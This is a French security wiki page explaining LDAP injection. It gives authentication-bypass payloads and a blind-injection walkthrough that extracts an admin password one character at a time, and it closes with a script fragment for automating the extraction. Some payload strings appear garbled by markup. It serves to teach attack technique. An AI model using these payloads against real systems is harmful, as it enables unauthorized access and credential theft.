====== LDAP injections ======
Voici un bref aperçu des injections LDAP. Nous retrouverons les deux types d'injections: les standards avec connaissance de la syntaxe, et les injections à l'aveugle.
Le principe est identique aux autres types d'injections SQL, XPATH. Seule la syntaxe change.
===== Injection de base sur authentification username/password=====
----
La requête de base pour une authentification LDAP est:
resultat=(&(user=)(pass=))
Pour en être sûr, ou pour connaître la syntaxe de la requête, nous pouvons, comme pour une SQLi, provoquer une erreur dans la requête, exemple en mettant ')' dans le champ user, on obtient:
ERROR : Invalid LDAP syntax : (&(uid=))(userPass=)))
La première parenthèse fermante fait partie des valeurs saisies, elle ne doit pas être prise en compte dans la construction de la requête.
Le & représente l'opérateur logique AND, et les deux variables user et pass représentent deux champs présents dans l'annuaire LDAP.
Le but de l'injection est donc de bypasser le password. pour cela, on peut compléter la requête par d'autres opérateurs logiques.
Pour valider la requête, il faut qu'elle renvoie TRUE, donc que user ET password soit vrais.
Le plus simple, est de saisir:
* user= *****
* pass=***)(&**
Cela va donner:
* avant: resultat=(&(user=)(pass=))
* après: resultat=(&(user=*****)(pass=***)(&**))
Il est possible qu'une vérification sur la présence du caractère * soit faite sur le champ pass. D'où la nécessité de saisir quelquechose dans ce champ.
Nous pouvons forger la requête suivante en rajoutant dans le champ user un autre opérateur logique comme le OR représenté par un pipe |:
* user=*)(|(&
* pass=)
resultat=(&(user=*)(|(&)(pass=))
Le terme (&) renvoie toujours vrai, c'est très pratique pour compléter des filtres.
Cette requête bypasse le password avec une parenthèse fermante pour respecter la syntaxe de la requête. Il faut la lire comme suit: user=(* ET __('VRAI' OU pass=)__)
===== Les injections à l'aveugle =====
----
Un exemple:
resultat=(&(=**)(=**))
Nous essayons avec quelques valeurs afin de comprendre sur quel(s) champ(s) est faite la requête:
* En saisissant "i", on obtient:
3 results
sn : Alice
Email : alice@zenk.org
sn : Patrick
Email : patrick@zenk.org
sn : admin
Email : admin@zenk.org
Avec plusieurs essais de requêtes, nous en déduisons que la requête doit contenir les champs sn et mail. Le champ "mail" est déduit des différents essais notamment en saisissant un @ qui renvoie tous les users avec une adresse mail. C'est sur ce champ que la valeur est testée.
Nous devons avoir une requête se rapprochant de cela:
resultat=(&(sn=*)(mail=**))
En remplaçant par notre injection __*)(=__:
resultat=(&(sn=*)(mail=*)(=*))
L'injection: resultat=(&(sn=*)(mail=*__a*)(=__*))
Il faut respecter les *, à savoir en rajouter une à la fin de la valeur du champ mail, et ne pas en mettre à la fin de password, il y en a déjà une, elle correspond initialement à l'étoile fermant la valeur de mail.
resultat=(&(sn=*)(mail=*admin*)(password=d*))
nous déduisons de tout cela que seul le user admin possède le champ password mais tous les users ont un champ userpassword!
* La requête @*)(userpass= renvoie tous les users.
* La requête @*)(pass= ne renvoie que admin.
Il ne reste plus qu'à tester tous les caractères du champ password pour le user admin:
* La requête admin*)(pass=* renvoie une erreur de syntaxe.
* La requête admin*)(pass= renvoie //admin//
* La requête admin*)(pass=a renvoie //0 results//
* La requête admin*)(pass=d renvoie //admin//
* La requête admin*)(pass=ds renvoie //admin//
* etc...
===== Les outils =====
----
* un simple script pour trouver le mot de passe. il est quasi identique à celui de [[failles_web:xpath_injection|XPATH Injection]]. Il faudra remplacer:
req=page+"Alice') and starts-with(../password,'"+passwd+carac
par:
req=page+"a*)(password="+passwd+carac
* Un dico pour trouver les champs userpassword et password et tous les autres d'ailleurs ^^.FIXME